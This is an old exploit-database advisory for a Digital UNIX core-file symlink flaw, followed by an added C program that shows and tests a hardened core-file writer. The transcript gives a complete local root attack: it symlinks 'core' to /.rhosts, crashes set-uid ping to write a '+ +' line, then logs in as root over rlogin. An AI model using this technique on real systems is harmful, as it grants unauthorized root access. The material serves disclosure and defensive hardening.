Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability

1998-04-06T00:00:00
ID EDB-ID:19068
Type exploitdb
Reporter ru5ty and SoReN
Modified 1998-04-06T00:00:00

Description

Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability. Local exploit for unix platform

source: http://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writing core files if two setuid programs dump core in succession. The core file is owned by root but carries the user's group id, and its permissions are 0600. This can be used to create a root-owned file anywhere in the filesystem. Because the dumping process's environment is part of the core image, the attacker also controls part of the file's contents; the transcript below uses that to drop a "+ +" line (from the variable IMP) into /.rhosts, which is enough for rlogin to accept a root login from any host.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
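The following C program is an added illustration of the two checks a hardened core writer needs against this bug class; it is not part of the exploit-db entry or of Digital UNIX, and the function names, the scratch directory under /tmp and the file names inside it are made up for the example. It assumes a POSIX system whose open(2) supports O_NOFOLLOW (Linux or a BSD). may_dump_core() is the policy rule that a process whose real and effective ids differ never dumps at all; safe_core_open() creates the file without following a symlink and without reusing a file that is already there; run_core_open_scenarios() replays the setup from the transcript above (a symlink named core pointing at a stand-in for /.rhosts) and confirms that the link target is never created.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Negative results from safe_core_open(); a non-negative result is an fd. */
enum {
    CORE_REFUSED_SYMLINK = -1,   /* "core" is a symlink: the BID 74 case       */
    CORE_REFUSED_EXISTS  = -2,   /* a file is already there and is not ours    */
    CORE_REFUSED_OTHER   = -3    /* any other open() failure (ENOENT, EACCES)  */
};

/*
 * Policy check: a process whose effective ids differ from its real ids
 * (a set-uid or set-gid binary such as /usr/sbin/ping) must not dump core
 * at all, because the image would be written with privileges the invoking
 * user does not have and would contain privileged memory.  This is the
 * same idea as Linux's "dumpable" flag, written out here as an added
 * illustration rather than copied from any kernel.
 */
int may_dump_core(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid == euid && rgid == egid;
}

/*
 * Create the core file the way a hardened writer would:
 *  - O_NOFOLLOW: never follow a symlink at the final path component,
 *  - O_CREAT|O_EXCL: only create a brand-new file, never reuse (or
 *    truncate) one that somebody else planted,
 *  - mode 0600: the image stays private to its owner.
 * The open flags carry the security property.  The lstat() afterwards only
 * classifies the failure for the caller (Linux reports a symlink under
 * O_CREAT|O_EXCL as EEXIST, other systems as ELOOP); it is not what makes
 * the call safe.
 */
int safe_core_open(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0)
        return fd;
    if (errno == EEXIST || errno == ELOOP) {
        struct stat st;
        if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode))
            return CORE_REFUSED_SYMLINK;
        return CORE_REFUSED_EXISTS;
    }
    return CORE_REFUSED_OTHER;
}

/*
 * Replay the advisory's scenario in a scratch directory: "core" is a symlink
 * to a file that must never come into existence (a stand-in for /.rhosts).
 * Returns 0 when every check passes, otherwise the number of the first
 * check that failed.  Paths and names here are constructed for the example.
 */
int run_core_open_scenarios(void)
{
    char dir[] = "/tmp/corechkXXXXXX";
    char link[PATH_MAX], target[PATH_MAX], fresh[PATH_MAX];
    struct stat st;
    int fd, rc = 0;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(target, sizeof target, "%s/rhosts", dir);
    snprintf(link,   sizeof link,   "%s/core",   dir);
    snprintf(fresh,  sizeof fresh,  "%s/core.2", dir);

    /* 1. the attacker plants the symlink exactly as in the transcript */
    if (symlink(target, link) != 0)
        rc = 2;
    /* 2. the hardened writer refuses to open through it ... */
    else if (safe_core_open(link) != CORE_REFUSED_SYMLINK)
        rc = 3;
    /* 3. ... and the link target was never created */
    else if (access(target, F_OK) == 0)
        rc = 4;
    /* 4. a fresh name is accepted and comes out with mode 0600 */
    else if ((fd = safe_core_open(fresh)) < 0)
        rc = 5;
    else {
        if (fstat(fd, &st) != 0 || (st.st_mode & 07777) != 0600)
            rc = 6;
        close(fd);
        /* 5. a second dump must not reuse the file that now exists */
        if (rc == 0 && safe_core_open(fresh) != CORE_REFUSED_EXISTS)
            rc = 7;
        unlink(fresh);
    }
    unlink(link);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_core_open_scenarios();
    printf("core-writer checks: %s (code %d)\n", rc == 0 ? "all passed" : "FAILED", rc);
    printf("set-uid ping may dump core: %s\n",
           may_dump_core(1000, 0, 100, 100) ? "yes" : "no");
    return rc;
}
```

Both checks matter: the ownership rule alone would still have stopped the transcript (ping runs set-uid root, so it would never dump), and the open flags alone would still have stopped the symlink even for an unprivileged dump. A writer that wants to keep core files for set-uid programs for debugging has to do what later Unixes do, namely dump to a root-owned directory it controls rather than to the working directory the user picked.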